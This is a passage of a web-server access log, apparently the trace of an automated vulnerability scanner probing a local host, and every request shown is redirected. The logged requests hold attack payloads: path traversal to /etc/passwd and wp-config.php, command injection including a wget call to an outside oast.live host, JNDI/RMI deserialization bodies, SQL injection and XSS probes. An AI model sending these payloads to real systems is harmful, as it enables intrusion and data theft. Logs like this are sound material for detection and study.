"http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///c://windows/win.ini\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.860","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.906","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.921","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/databases.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://c9oms3gsmpve1ijt0mc0x9yhdu8fzbedp.oast.live&url=foo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.265","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /network-login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://c9oms3gsmpve1ijt0mc0gdxnupzpm1u4h.oast.live/Exploit\x22\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.357","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.262","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.241","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.242","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?plot=;wget%20http://c9oms3gsmpve1ijt0mc0yodfhto7wotuw.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.994","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://c9oms3gsmpve1ijt0mc08wp3rb3hmp81c.oast.live/Exploit\x22\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.243","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.330","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%C2%A7VS%C3%82%C2%A7&__VIEWSTATEGENERATOR=%C3%82%C2%A7VSG%C3%82%C2%A7&__EVENTVALIDATION=%C3%82%C2%A7EV%C3%82%C2%A7&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.246","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.248","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/c9oms3gsmpve1ijt0mc0qxzs8w65g9z5s.oast.live/Exploit\x22\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / 